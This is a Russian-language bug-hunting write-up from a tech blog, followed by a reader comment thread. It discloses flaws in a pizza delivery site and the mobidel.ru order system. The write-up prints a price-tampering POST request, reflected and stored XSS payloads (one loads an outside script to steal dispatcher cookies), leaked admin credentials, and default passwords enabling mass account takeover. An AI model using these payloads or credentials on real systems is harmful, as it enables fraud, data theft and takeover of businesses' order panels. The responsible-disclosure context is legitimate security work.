Я часто заказываю пиццу в Одессе, больше всего люблю доставку pizza.od.ua, там не жалеют начинки и можно создать пиццу из своих ингредиентов, в других же службах доставки можно выбрать только ту пиццу, которую тебе предлагают, добавить еще ингредиентов или выбрать другие нельзя. Месяца два назад я подсел на суши у них. С недавних пор суши временно не доставляют, тогда я нашёл другую доставку суши и пиццы.

Я решил проверить её на уязвимости.

Первая уязвимость — самая популярная на таких сайтах — это отсутствие проверки суммы платежа за товар (iDOR).

Есть в POST запросе переменная price, есть finalPrice, переменная finalPrice поддается редактированию и можно будет сделать себе скидку на пиццу. Запрос:

POST /oplata.html HTTP/1.1
Host: www.pizza.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://yahoo.com/{{2+2}}
Content-Length: 262
Cookie:

streetId=&streetName=qwqwqw&persons=1&change=500&name=qw&phone=%2B38(111)1111111&email=mm%40mm.mm&t-ord=&comment=&promocode=&agreement=on&check-ord=online&order%5B0%5D%5Bid%5D=1162&order%5B0%5D%5Bamount%5D=2&order%5B0%5D%5Btype%5D=rollyi&price=210&finalPrice=30

Изменяем finalPrice и мы заплатили за пиццу 30 гривен вместо 210. Заказ приняли, но администраторы заметили подмену и отказались присылать мне пиццу.

Вторая уязвимость. Когда отправился заказ, происходит редирект на страницу pizza.com/your_order.html?order=567808&ret=1, номер заказа выводится на страницу. Вместо номера вписываем js pizza.com/your_order.html?order=">&ret=1 и получаем Reflected XSS уязвимость.

Третья уязвимость это Logout csrf и clickjacking Disclosure information и захват административной панели заказов.

Оказалось, что когда мы заказали еду, то она еще не добавлена в админку на проверку. Чтобы добавить заказ, сайт создает на странице pizza.com/your_order.html?order=567808&ret=1 iframe с адресом:

http://pizza.com/your_order.html?order=567808&curl1=aHR0cDovL29ubGluZS5tb2JpZGVsLnJ1L21ha2VPcmRlci5waHA/dXNlcj1yb290JnBhc3N3b3JkPXBhc3dvcmQmd2lkPTQwNTAmZmFtaWx5PSUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmc3RyZWV0PTElMkMxJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyZob21lPSZyb29tPSZlbnRyYW5jZT0mZmxvb3I9JnBob25lPTM4MDYzNjgxOTQ2NCZjb21tZW50PSVEMCU5RSVEMCVCRiVEMCVCQiVEMCVCMCVEMSU4NyVEMCVCNSVEMCVCRCslRDAlQkUlRDAlQkQlRDAlQkIlRDAlQjAlRDAlQjklRDAlQkQlMjErJTNDYnIlM0UlRDAlOUQlRDAlQjArJUQwJUIyJUQxJTgwJUQwJUI1JUQwJUJDJUQxJThGJTNBJTIyJTNFJTNDaW1nK3NyYyUzRHgrb25lcnJvciUzRHByb21wdCUyODElMjklM0UrcXclN0IlN0IyKzIlN0QlN0RxdyslRDAlOUYlRDElODAlRDAlQkUlRDAlQkMlRDAlQkUtJUQwJUJBJUQwJUJFJUQwJUI0KyUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXclRDAlOUElRDAlQkUlRDAlQkIlRDAlQjglRDElODclRDAlQjUlRDElODElRDElODIlRDAlQjIlRDAlQkUrJUQwJUJGJUQwJUI1JUQxJTgwJUQxJTgxJUQwJUJFJUQwJUJEKy0rMSslRDAlOUYlRDAlQkUlRDAlQjQlRDAlQjMlRDAlQkUlRDElODIlRDAlQkUlRDAlQjIlRDAlQjglRDElODIlRDElOEMrJUQxJTgxJUQwJUI0JUQwJUIwJUQxJTg3JUQxJTgzKyVEMSU4MSsrJUQwJTlBJUQwJUJFJUQwJUJDJUQwJUJDJUQwJUI1JUQwJUJEJUQxJTgyJUQwJUIwJUQxJTgwJUQwJUI4JUQwJUI5KyVEMCVCRiVEMCVCRSVEMCVCQiVEMSU4QyVEMCVCNyVEMCVCRSVEMCVCMiVEMCVCMCVEMSU4MiVEMCVCNSVEMCVCQiVEMSU4RiUyMiUzRSUzQ2ltZytzcmMlM0R4K29uZXJyb3IlM0Rwcm9tcHQlMjgxJTI5JTNFK3F3JTdCJTdCMisyJTdEJTdEcXcmYXJ0aWNsZXMlNUIwJTVEPTA1ODkmYXJ0aWNsZXMlNUIxJTVEPTEyMDkmbm9uQ2FzaD0xJnF1YW50aXRpZXMlNUIwJTVEPTQmcXVhbnRpdGllcyU1QjElNUQ9MQ==


curl1 — это адрес сайта, который загрузится во фрейме, выглядит, как base64, декодируем его, получается раскодируем, получается это online.mobidel.ru/makeOrder.php?user=root&password=password&wid=5040&family=даннные_нашего_заказа, wid -ид площадки, пытаемся войти в админку online.mobidel.ru и у нас это получилось. Смотрим на наш заказ, его можно редактировать, отправить в обработку от имени диспетчера и получить бесплатную пиццу (делать я этого конечно не буду).



Ещё можем смотреть данные всех клиентов и текущие заказы




Сообщаем в службу доставки пиццы об этой уязвимости, получаем 10 любых бесплатных пицц или суши.

Хронология:

29 января. Сообщил об уязвимости.

30 января. Присвоена награда 20 бесплатных пицц или суши со скидкой 50 % (10 бесплатных пицц).

19 февраля. Уязвимость исправлена.

Теперь перейдем к mobidel.ru. Заказ создавался в get запросе с логином и паролем в открытом виде pizza.com/your_order.html?order=567808&curl1=хэш. Есть вероятность, что такая же уязвимость есть и в других клиентов. Смотрим страницу с клиентами, оттуда собираем url-ы их клиентов. Проверили, оказалось, что это был единственный случай, где логин и пароль идут в открытом виде.
Идём дальше.

1) Обнаруживаем Stored XSS

Если отправить через заказ скрипт:

">
</script>"><script src=https://securityz.net/any_script.js?></script> ,

То мы получим cookies диспетчера и взломаем админку заказов любого сайта, где выполнится данный скрипт. Уязвимые поля: Дом, время, промокод, комментарий.

2) Находим уязвимость Bruteforce & Account Takeover

Проходим регистрацию, нам приходит сообщение об активации тестового периода в 30 дней с нашими данными для входа:

  • ID предприятия: 5687
  • Имя пользователя: disp5687
  • Пароль: 123456



Я вошел в аккаунт, и сразу не смог найти, где изменить свой пароль. Наверное, и остальные пользователи тоже. Так и есть — почти каждый ид имеет пароль 123456. Около 2,5 тысяч пользователей имеют дефолтный пароль (те, кто активировал 30 дней бесплатно и некоторые аккаунты тех, кто на постоянной основе). Раскрывается множество email адресов, номеров телефонов и ФИО.



Если для кабинета диспетчера и был условный пароль 123456, то насчет кабинета курьера не стали заморачиваться:

  • ID предприятия:5687
  • Имя пользователя:5687
  • Пароль:5687

У этой компании за их услуги максимальная цена 2500 за мес, минимальная 500, у них всего 5600 клиентов, уверен, что хоть 2000 из них заказали услуги, 2000 умножаем на 1000, получается 2 000 000 рублей в месяц. Зарабатывают они неплохо (возможно, я ошибаюсь, и конверсия из 5600 может быть меньшей, но все равно неплохо), а вот о безопасности не заботятся.

29 января — присылаем 2 сообщения о нахождении уязвимости, 28 февраля — ещё одно письмо, 1 марта — ещё три письма, компания до сих пор игнорирует мои сообщения. 1 марта я связался с руководителем службы доставки пиццы, он сбросил ссылку на vk программиста, что работает в мобидел. Я отписал ему об уязвимости, он сказал, напиши на тот же email адрес, на этот раз тебя не проигнорируют.

Ответ компании:
Здравствуйте!

Мы бы не назвали это уязвимостью, а ваши действия вполне логичны, пароль
123456 стандартный для всех, те кто пользуется системой на постоянной основе
его меняют.

Мой ответ:
Те кто пользуется системой на постоянной основе его меняют. А те, кто не пользуется, вам наплевать на то, что их личные данные украдут?

Сообщение опять игнорируют, еще ответ:
Не нужно игнорировать эту уязвимость, игнорирование — не решение проблемы.

+ присылаем репорт о xss уязвимости с захватом любой службы доставки.

Даём компании 20 дней для того, чтобы она устранила свои уязвимости или хотя бы ответила на мои сообщения. Этого не происходит, выкладываю в общий доступ.

Как бонус вот такая фича пентестерам: когда необходимо протестировать уязвимость на сайте на двух аккаунтах, и ваша почта находится в Яндексе, то на одну почту можно зарегистрировать два аккаунта (mail@yandex.ru; mail@ya.ru).

Вывод с этой статьи: Никогда не нужно ставить дефолтные пароли на аккаунты, нужно генерировать только сложные пароли, с верхним, нижним регистром, цифрами и символами.

Мемы по этой теме:

image

Дополнение к статьи:

Мне в почту написал письмо один хакер из хабра о том, что тоже обнаружил уязвимость на mobidel. Я не брутил директории, да и вообще после того, как меня долго игнорировали, сайт практически не трогал. А он пробрутил и обнаружил открытый php файл с конфигами сервера (было очень глупо не закрыть его), там данные для: доступа к базе данных, данные для доступа в личный кабинет платежной системы robokassa (можно смотреть транзакции пользователей и управлять счетом mobidel), данные для доступа к админке mobidel на их сайте. Я не пытался никуда войти, просто написал письмо «немедленно закройте этот файл в .htaccess и поменяйте пароли», исправили очень быстро, теперь файл не доступен. И сказали спасибо.

Надеюсь, эта статья будет для них уроком и они закроют все свои уязвимости.

Предыдущая статья [БАГХАНТИНГ] BLIND XSS УЯЗВИМОСТЬ НА САЙТАХ СЛУЖБЫ ПОДДЕРЖКИ OMNIDESK
Поделиться с друзьями
-->

Комментарии (106)


  1. antonksa
    24.03.2017 21:28
    +12

    Думаю после этой статьи и пары тысяч фейковых заказов, сломанных админок, и полной сумятицы в бизнес-процессах часть клиентов в ужасе съе… ся, а программисты говноконторы таки будут вынуждены подставлять костыли, изобретать велосипеды, платить и каяться.
    гы-гы


    1. gzhegow
      25.03.2017 10:39
      +4

      А менеджерам дадут премию за отличную работу по телефону, директору премию что выдал задачу на реализацию новой системы защиты и отреагировал на уязвимость, супервайзеру премию за то что поставил раком программистов, программисты опять заплатят, а потом снова займутся работой, до которой у остороных даже чайник не докипает


  1. WildZero
    24.03.2017 23:42
    +4

    И сейчас набегут школохакеры


  1. PekaFat
    24.03.2017 23:42
    -6

    Далеко не все подобные мелкосайты готовы вознаграждать за такие находки, а некоторые могут и заявление написать.


  1. BearMef
    25.03.2017 01:19
    -16

    Отсутствие реакции на уведомление об уязвимости не является поводом для публичного раскрытия этой уязвимости.


    1. igordata
      25.03.2017 08:34
      +7

      Почему нет?


      1. total911
        25.03.2017 19:48
        -3

        из вредности


    1. coder11111
      25.03.2017 20:27
      +1

      BearMef т.е по твоей логике, если я увидел правонарушения, я должен молчать. Т.е если я увижу что девушку насилуют или грабят, то я должен просто пройти мимо. Круто. В принципе нормально мнение для грабителя/убийцы/психопата или просто тупого человека. Вот только и живи с таким мнениям сам, другим не навязчивый.


      1. Dreyk
        25.03.2017 21:45
        +4

        вот только раскрытие уязвимости публике — это все равно что кричать «смотрите, тут девушку изнасиловали, вон она ещё лежит в кустах, если кто хочет»


        1. coder11111
          25.03.2017 22:26
          +5

          Опять неправильно сравнения. Это разные вещи. И вообще я не думаю что нормальный человек увидев изнасилованую девушку крикнул то что вы сказали. Я бы постарался помочь.

          Вот пример который больше бы подошел. Если бы я увидел что водитель автобуса пьян, я бы всех предупредил и сам вышел из него. Так как в данном случаи водитель правонарушитель и его действия могут привести к плачевным результатам.

          А теперь реальный пример на эту тему.

          Например есть магазин с уязвимостью, через которую мы можем получить доступ к бд. В бд хранятся кредитные данные и не только. Я написал магазину что у вас уязвимость и тд. Они мне ответили что им все равно, это фича или вообще проигнорили. И после этого я просто твитнул чтобы другие люди там ничего не покупали так как там есть уязвимость и даю пруф. Вроде все логично. Хотя я могу найти уязвимость и сразу ее слить. Я им ничего не обязан. Это они обязаны не передавать данные клиентов третьим лицам. И может так они ее исправлять или хоть эта информация попадет в соответствующие органы. И вообще такую инрормацию я могу сразу рассказать в правоохранительные органы, так даже логичнее. И не нужно меня пугать, что меня за это посадят. Во первых мне 14 лет, во вторых правонарушитель на я, а магазин


        1. coder11111
          25.03.2017 22:36
          +1

          Или например возле мусорной урны своего банка вы увидели ксерокс данных клиентов, такие как паспорт и т.д. И нашли бы свои. Вам бы понравилось?)


          1. megavolt0
            28.03.2017 14:33
            -3

            ксерокс данных
            зингер ниток
            запорожец километров
            эппл денег


            1. coder11111
              28.03.2017 16:02

              Вот скажите почему вы сюда зашли и написали этот бред? Вы думали так самоутвердится перед школьником? Если вы думаете что «ксерокс» это только название производителя, то вы ошибаетесь

              https://ru.wikipedia.org/wiki/Ксерокс

              «Ксерокс — [реже] а) ксерокопия б) любая фотокопия»

              И в дальнейшем не показывайте и так свою очевидную тупость


              1. megavolt0
                28.03.2017 16:13
                -2

                Данное определение как раз таки пошло от тупости и скудного кругозора. Также, как например, слово «джип».


                1. coder11111
                  28.03.2017 16:30

                  Почему нельзя укоротить слово ксерокопия в ксерокс? И почему корпорация apple себя так назвала? Тоже от скудного кругозора? И вообще, дядя, вы читали про что статья? Вы мне написали тупой не уместный бред. Или может здесь еще будем про звезды вести дискуссию?


    1. romanegunkov
      27.03.2017 19:24

      Отсутствие реакции на уведомление об уязвимости может быть расценено как подстрекательство к использованию уязвимости.


  1. 0ther
    25.03.2017 01:50

    Пинать и так лежачих и даже не пытающихся защищаться…
    С другой стороны — может стоит не изобретать велосипеды, а поставить CMS и нормального разработчика нанять, раз всё равно ни черта в этом не понимаете и это вообще не ваша область?


    1. areht
      25.03.2017 02:52
      +5

      Когда, вместо защиты, прописывают в оферте отсутствие ответственности за «7.4.1. Неправомерных действий пользователей сети Интернет, направленных на нарушение информационной безопасности или нормального функционирования сайта Программы.» — надо не то, что пинать…

      Я понимаю, когда бесплатные сервисы такое прописывают. Но такие облачные сервисы для бизнеса у меня вызывают недоумение, как если бы я в продуктовом нашел надпись «За посторонние предметы в колбасе завод ответственности не несёт».


      1. pyrk2142
        25.03.2017 04:00
        +1

        На самом деле, ситуация еще хуже.

        Сейчас настолько много уязвимых сервисов, которые предлагают бизнес-услуги, что чуть ли не каждый второй дырявый. Например, недавно посмотрел порядка 20 сервисов рассылки писем: половина с очень очевидными дырами — прощайте базы с адресами.


  1. vanxant
    25.03.2017 02:04
    +6

    Трюк с почтой такой: все, что идет в имени пользователя после символа +, игнорируется большинством почтовых серверов. Т.е. письма на vasya+t1@gmail.com будут доставляться на vasya@gmail.com


    1. makcpop
      25.03.2017 10:34

      Gmail так же игнорирует "." в имени пользователя. То есть письма отправленные на username@gmail.com и us.er.na.me@gmail.com придут на один ящик.
      Яндекс, в свою очередь, раньше не различал "-" и "_". user-name@yandex.ru и user_name.ru были одним почтовым ящиком.


      1. Fenex
        25.03.2017 18:27
        +1

        Яндекс сейчас не различает "." и "-".


        1. Keyten
          25.03.2017 23:38
          +1

          ya.ru и yandex.ru он тоже не различает в адресе почты, кстати)


          1. MikailBag
            26.03.2017 18:28
            +2

            а еще yandex.by, yandex.ua и yandex.kz


    1. Geograph
      25.03.2017 17:35

      плюс в email может не пройти валидацию


    1. bykvaadm
      27.03.2017 19:03
      +1

      это не игнорирование, а описанное поведение в RFC. письмо отправляется на почту vasya@gmail.com, при этом в поле кому будет адрес vasya+t1@gmail.com

      это поведение нужно для удобного «тегирования» тех, кто посылает вам почту. После чего можно писать фильтры и раскладывать почту по папкам, заранее не зная адрес отправителя. Так, например, если вы зарегистрировались на ресурсе, который будет вам посылать почту от адресов «бухгалетрия», «тех поддержка», «accounting», «no-reply» ........, то заранее не зная все адреса с которых вам может эта компания написать, можно всегда фильтровать по адресу кому: info+company_name@gmail.com по тегу company_name


  1. reactors08
    25.03.2017 02:55
    -6

    Да это явный позор, что вышеупомянутая компания не может закрыть уязвимость и игнорирует вас. Но есть еще и не явный позор которому к сожалению все аплодируют, а именно тому, что вы раскрыли уязвимость.
    Во первых — я вас возможно очень удивлю, но уязвимы все и даже огромные корпорации, причем бывают настолько изящные баги, что удивляешься как такое можно было допустить (наподобие вашей). И тратят эти корпорации огромные деньги на аудиты, на экспертов в ИБ и прочие вкусности но игнорируют при всём при этом сторонних исследователей вроде вас. И это не что-то из ряда вон выходящее из за чего стоит срочно бежать на хабр и говорить «смотрите как всё плохо».
    Во вторых — ждать приходиться порой и пол года и год и это не какие-то od.ua или безымянные mobidel.ru… и работают там не вчерашние студенты, которые скорее всего даже не сильно понимают, что вы им репортите, а слаженная команда разработчиков. Поэтому ваши 20 дней на фикс это чисто взятая с потолка цифра ни на чём не основанная так же как и математика прибыльности компании не больше чем ваши размышления не подкрепленные компетентностью в этом и отдаленные от реальности.
    В третьих — А вы хоть предупредили, что будет публикация? А они хоть знают о том, что эта статья существует?
    В четвертых — Вопрос этичности остаётся открытым — а кто вы собственно такой, чтобы лезть к ним в админку или тестить IDOR получая чужие данные?
    И к сожалению добавлю, что если вы их откровенно спросите хотят ли они чтобы вы продолжили свои поиски, то вероятнее всего они попросят вас оставить их в покое. Да, вы живете в не идеальном мире где есть место как ошибкам так и халатному отношению к делу. И с вашими знаниями вы для них не супергерой, а «боль» и им не важно какая на вас одета шляпа. Будьте терпимее, пытайтесь найти к таким ребятам подход, пробуйте давить на них но не спешите с раскрытием, ведь вы хотели изначально помочь, а не выставить их слабые стороны на всеобщее обозрение, не так ли?


    1. pyrk2142
      25.03.2017 04:04
      +5

      И к сожалению добавлю, что если вы их откровенно спросите хотят ли они чтобы вы продолжили свои поиски, то вероятнее всего они попросят вас оставить их в покое. Да, вы живете в не идеальном мире где есть место как ошибкам так и халатному отношению к делу. И с вашими знаниями вы для них не супергерой, а «боль» и им не важно какая на вас одета шляпа.


      Тут я бы не согласился. В вопросах безопасности сервисов не надо принимать во внимание желания компаний. Если вы узнали, что хирург режет пациентов грязным ножом, а он попросит не говорить, вы же не будете молчать? Так и тут: предоставляешь услуги людям, будь готов обеспечивать безопасность. Иначе рано или поздно украдут и твои данные.


      1. Jef239
        25.03.2017 05:08
        +1

        Да нет, тут речь о том, что если вы очнетесь во время операции, то легко можете стащить острый скальпель. А потом зарезать им свою кошку. О том, что можно для этого просто купить нож в магазине, вы забыли.

        Адресные базы паспортных столов и мобильных операторов давно есть в открытом доступе. Не говоря уже о том, что во времена СССР издавались телефонные справочники домашних абонентов — фамилия, имя, адрес и номер телефона.


        1. askv
          25.03.2017 10:04

          Адреса туда не включались. Зная адрес и ФИО можно было в справочной узнать номер телефона, но не наоборот.


          1. Jef239
            25.03.2017 20:19
            +4

            «Давайте спорить о кусе устриц с теми кто их ел» (с) Жванецкий. Как вы Ивановых Иван Иванычей отличите? По дате и месту рождения? В справочнике ЛГТС 1961 года были фамилии, инициалы и адреса.

            Скриншота страницы вам хватит?
            image


            1. askv
              28.03.2017 22:29
              +1

              Это какой-то из ранних справочников — буквы в номерах телефонов. Номеров квартир нет… В перестроечное время уже адресов не было, по крайней мере в тех справочниках, которые я видел.


              1. Jef239
                28.03.2017 23:46
                +1

                Я же сразу написал «во времена СССР». :-) В постперестроечные времена вообще не помню, чтобы издавался справочник квартирных абонентов. Вроде последний по Питеру — 1969ого года. Но если издавался, то проблема та же — как отличить двух Ивановых Иван Иванычей. Или нужен год и место рождения — или адрес. Ну вот вам список абонентов ЛГТС 1940ого года — решение то же самое. Фамилия, инициалы и адрес

                Пруф 1940ого года
                image


                1. askv
                  28.03.2017 23:57
                  +2

                  Я говорил про перестроечное время, это было во время СССР. В то же время номер абонента можно было узнать в справочной 09 по-моему, назвав ФИО и адрес. Т.е. список абонентов с адресами получить было уже нельзя.


                  1. Jef239
                    29.03.2017 00:30

                    Это разные вещи. Одно дело — что 09 не имела права выдавать больше 5 телефонов, другое — печать справочника. Технически строже: индексные поля СУБД для 09 не имеют отношения к политике приватности. Просто индексы сделали такими, а не другими.

                    P.S. Могу рассказать, как была устроена 09 в Душанбе на уровне примерно 1980ого года. В это время Москва ещё работала по бумажной картотеке.


              1. Awoody
                30.03.2017 17:07
                +1

                В Ленинграде перешли на 7-значные номера около 1975 года.


      1. areht
        25.03.2017 15:53
        -7

        Если вы узнали, что хирург режет пациентов грязным ножом, а он попросит не говорить, вы же не будете молчать?

        Это из серии «а если бы он вез патроны?». Пара бесплатных пицц и не сравнимы с работой хирурга.


        Иначе рано или поздно украдут и твои данные.

        Все равно украдут, рано или поздно. Не с этого сайта, так с другого.


        Наивно ожидать от каждой пиццерии защиты данных на уровне государственной тайны, как и чистоты на уровне операционной. По крайней мере, пока Вы не готовы платить за пиццу как за операцию.


        1. coder11111
          25.03.2017 20:08
          +2

          Думал вам что то написать по теме. Но после посмотрел на ваш профиль и понял что вы просто тролль. Нету смысла что то вам писать. Вот ответьте мне на вопрос, мистер тролль. Почему я должен соблюдать законы, а другие нет? почему я в свои 14 лет должен кодить лучше чем дядьки с усами в 20?


          1. areht
            25.03.2017 20:23
            -1

            > Нету смысла что то вам писать. Вот ответьте мне на вопрос

            Смешно.


            1. coder11111
              25.03.2017 20:31

              лол, ну так смыла то нету. И вы только что это доказали. Или вы думали что я что то умное от вас ожидал? Я вас затролил, если вы еще не поняли) хаах)


              1. areht
                25.03.2017 23:45

                О нет! Какой вы злой и коварный гений…


          1. Jef239
            25.03.2017 20:26

            Ну ОК, расскажите, какие законы нарушила одесская пицца? Законы РФ и США — не предлагать.


        1. Jef239
          25.03.2017 20:20

          Добровольное Пиццерийное Страхование???


          1. areht
            25.03.2017 21:25

            Страхование работает тогда, когда за страховкой обращается один из сотни. Если вы хотите пиццу каждый день, то быстро упрётесь в ограничение страхового покрытия.


            1. Jef239
              25.03.2017 21:40

              А это ничего, что у нас на работе 90% процентов обращаются по ДМС? :-) Другой момент, что общее страховое покрытие по фирме мы не выбираем.

              Вы забыли ещё, что страховая покупает по оптовым ценам, которые могут в десяток раз отличаться от розничных.

              Ну как пример "к стоимости $1000 за осмотр твоя страховая получила скидку в $950"


              1. areht
                25.03.2017 22:26

                Ок, 90% обращаются раз в год за осмотром ценой в $50, оплатив страховки на $3000. А вы это к чему?


  1. Jef239
    25.03.2017 05:04
    +6

    Мне это сильно напомнило "хакер в столовой".


    1. areht
      25.03.2017 05:35
      +1

      Я, кстати, много где видел, что официант приносит соль-сахар-зубочистки вместе с приборами. В одноразовых фирменных упаковках.


    1. BigD
      25.03.2017 16:07
      +6

      Читал много лет назад. До сих пор с опаской смотрю на солонки в общепите.


      1. FAT16
        30.03.2017 19:41
        +1

        Рядом с фирмами, которые специализируются на ИБ…


  1. beduin01
    25.03.2017 07:22
    -3

    С таким же успехом можно по подъездам ходить искать уязвимости квартирных замков и если человек за 20 дней замок не поменял то опубликовывать данные о уязвисости его квартиры.


    Вам не приходило в голову, что не все компании могут и хотят держать целый штат ИТ специалистов и разных безопасников если их основная деятельность совсем с ИТ не связана.


    Действия же подобных хакиров же реально должны наказываться. Да и утечек какой конфеденциальной информации все боятся? Интернет и так ей завален.


    1. amakhrov
      25.03.2017 07:43
      +6

      если их основная деятельность совсем с ИТ не связана

      Компания mobidel.ru — именно ИТ-компания. Они продают программный комплекс не-ИТ бизнесам.


      Да и утечек какой конфеденциальной информации все боятся? Интернет и так ей завален.

      Из этого следует же, что автор топика ничего плохого не сделал. Раскрыл уязвимость, воспользовавшись которой кто-то может слить конфиденциальные данные? Так "интернет и так ей завален".


      1. beduin01
        25.03.2017 07:58
        -6

        Автор топика смог проникнуть в чужую квартиру и опубликовал информацию о том как это можно сделать.


        1. Baradyr
          25.03.2017 10:37
          +6

          Я бы с Вами согласился, но автор и его близкие покупает у подобных сервисов услуги и оставляет им свои личные данные.


          1. beduin01
            25.03.2017 10:50
            -3

            Ок, хорошо, представим, что подобрал ключ от жэка (где эти личные данные тоннами лежат) и потом опубликовал инструкцию о том как это может сделать каждый.


            1. beduin01
              25.03.2017 11:32
              -3

              Можно еще кучу забавных кейсов поидумать. Из серии узнал номера кредиток и опубликовал их. Те кто не успел поменять пароли — сами дураки. Должны были о безопасности беспокоиться.


              На куче сайтов я сознательно регистрируюсь с паролем 123456 или его варианах для обхода системы "слишком простой пароль" т.к. Я не боюсь что мой акк там взломают. Ну взломают и хрен с ним. Иногда даже проще перерегиться, чем пароль вспомнить сложнее 123456.


              1. w9w
                25.03.2017 14:17
                +2

                Я тоже часто регистрируюсь с паролем 123456, но я знаю, что его скорее всего не подберут, потому что у меня логин в виде email, его мало кто знает и есть защита от брутфорса.

                В случае mobidel мы не можем вводить свой пароль при регистрации, сайт «насильно» устанавливает дефолтный пароль и присылает нам его на email, и поменять пароль непросто. Логин идёт в виде id, и даже если мы установим свой пароль, то его можно подобрать, потому что защиты от брутфорса нету.

                P.S: Написал дополнение к статьи.


            1. Baradyr
              25.03.2017 11:48
              +3

              Передёргивать подобными примерами неуместно.

              Пассажир обратил внимание, что у городского пассажирского автобуса:
              — суммарный люфт в рулевом управлении более 20 градусов;
              — а ещё тормоза в горочку еле держат при уклоне 23%;
              — и ещё что-то по мелочи.
              Пассажир связался с автоколонной и сообщил об этом. На что получил ответ:
              «Автобус ещё не попал в аварию, так что нормально».

              Ваши действия?


              1. beduin01
                25.03.2017 11:56
                -3

                Как же не уместно то? В данном случае имеет место целенаправленный взлом. А вот как раз пример с автобусом не в тему.


                Из серии: забор был не достаточно высокий и автор смог перелезть, хотя всюду висели таблички что это частная территория и вход воспрещен


                1. Baradyr
                  25.03.2017 15:00
                  +5

                  В данном случае и приведённом примере:
                  — компетенции человека хватило на указание наличии проблемы;
                  — ответственные личности проигнорировали проблему;
                  — в обоих случаях могут быть последствия разной степени тяжести (могла быть не пицца, а магазин по продаже лекарств, или оказание каких-нибудь важных услуг для определённого круга лиц);

                  Вы считаете, что подобные ситуации надо оставлять как они есть и забить на возможные последствия?


                  1. beduin01
                    25.03.2017 15:08
                    -4

                    >компетенции человека хватило на указание наличии проблемы
                    компетенции человека хватило чтобы указать на возможность перелезть через забор

                    >ответственные личности проигнорировали проблему
                    Кто по вашему в фирме которая не занимается ИТ является ответственным? Владелец? Администратор? Им нужно было бежать фрилансера искать или заключать договор с фирмой по информационной безопасности чтобы там баги закрыла?

                    >в обоих случаях могут быть последствия разной степени тяжести (могла быть не пицца, а магазин по продаже лекарств…

                    Отлично просто. Я пришел в аптеку и смог войти в день с табличкой «вход воспрещен».


                    1. coder11111
                      25.03.2017 19:44
                      +1

                      beduin01, та же аптека обязана продавать сертифицированный товар и хранить данные клиента от третьих лиц. По крайне мере так в СНГ. В других странах еще намного жестче. Если она продаст поддельный товар, или передаст мои данные третьим лицам, то отвечать будет в первую очередь она. Так как есть соответствующие законы. Ваши сравнения чрезвычайно тупые и похожи на троллизм.

                      По вашей логике, получается что все магазины могут слить мои данные, например от кредитных карт и при этом они будут правы. Пусть еще табличку повесят себя, «Мы плевали на все законы и делает/продаем что хотим, у нас есть табличка, которая идет в разрез со законами, так что мы вас предупредили.»

                      Кстати, а если я открою магазин, и поставлю туда табличку, например что я продаю запрещенные психо вещества, то мне же ничего не будет? На законы же плевать?

                      Если честно, то от вашей тупости тошнит


                      1. Jef239
                        25.03.2017 21:55
                        -1

                        Приведите ссылку закон, обязательный для всего СНГ. И Доказательства, что Украина должна этому закону подчиняться (она не ратифицировала ни устав СНГ, ни протокол).

                        Может проще не путать законы разных стран?


                    1. Baradyr
                      25.03.2017 19:48
                      +1

                      Мой вопрос Вы проигнорировали, жаль. Хотелось услышать, как действовать в подобной ситуации.

                      Им нужно было бежать фрилансера искать или заключать договор с фирмой по информационной безопасности чтобы там баги закрыла?

                      Да. Это ведь сайт коммерческой организации и она несёт ответственно перед своими клиентами.
                      Или стоит дождаться, пока утечка не станет на столько явной, что этим займутся правоохранительные органы, после жалобы клиентов?

                      Отлично просто. Я пришел в аптеку и смог войти в день с табличкой «вход воспрещен».

                      Прекращайте использовать подобные примеры, они не верны.

                      Вымышленный пример из реальной жизни, если они так Вам нравятся:
                      Наркоман залез в подвал (ребёнок залез за котёнком или просто из любопытства) вашего дома. Когда он оказался в нём, то обнаружил, что по фундамент дома частично размыт, по несущим конструкциям идут трещины и присутствует физическая деформация.
                      Лицу обнаружившему такое нужно промолчать? Ведь никто ещё из жильцов не жаловался, а организация обслуживающее здание наверняка в курсе проблемы. Так?


  1. amakhrov
    25.03.2017 07:43

    удален дубль


  1. Shaco
    25.03.2017 10:37

    >> на одну почту можно зарегистрировать два аккаунта (mail@yandex.ru; mail@ya.ru)

    У меня в поле «от кого» при отправке письма помимо этих двух доменов есть ещё mail@yandex.by, mail@yandex.com, mail@yandex.kz и mail@yandex.ua, так что адресов целых шесть :)


    1. UksusoFF
      25.03.2017 12:34
      +1

      Еще можно привязать мобилку и будет +71231231212@yandex.ru

      UPD: Даже не так. Будет еще 6 почт с теми же доменами.


    1. shogunkub
      25.03.2017 12:57
      +1

      На gmail c плюсами можно регать сколько угодно аккаунтов на один ящик. Мы это для тестирования используем, можно нагенерить сколько угодно ящиков вида mymail+testN@gmail.com, например. В сравнении с этим 6 доменов — мелочь.


    1. emela777
      25.03.2017 13:48

      Помимо них еще в яндексе narod.ru можно юзать


  1. pakrauce
    25.03.2017 10:37
    +1

    Кроме mail@yandex.ru и mail@ya.ru можно еще использовать mail@yandex.com и насколько знаю этим не ограничивается. Все приедт на один ящик


    1. ivan386
      25.03.2017 14:36
      +2

      А ещё можно зарегать бесплатный домен. Привязать его к яндексу. Зарегать ящик и назначить его поумолчанию. Тогда письма на любое_имя@ваш_домен будут на него приходить.


    1. Boomburum
      26.03.2017 01:17
      +1

      Там же ещё вроде yandex.ua, narod.ru и что-то ещё.


  1. romanegunkov
    25.03.2017 13:34
    -2

    Зачем тратиться на толковых разработчиков если есть добрые люди, которые за еду сообщают о дырах в безопасности. А можно ещё и заставить исправить, под угрозой уголовной ответстенности, как некоторые выше писали.
    Так что вы продолжайте сообщать по почте, ждите по 20 дней, вас, надеюсь, не закроют, но, если что, знайте, вы человек добрый и честный — это просто мир не идеален.


  1. rockin
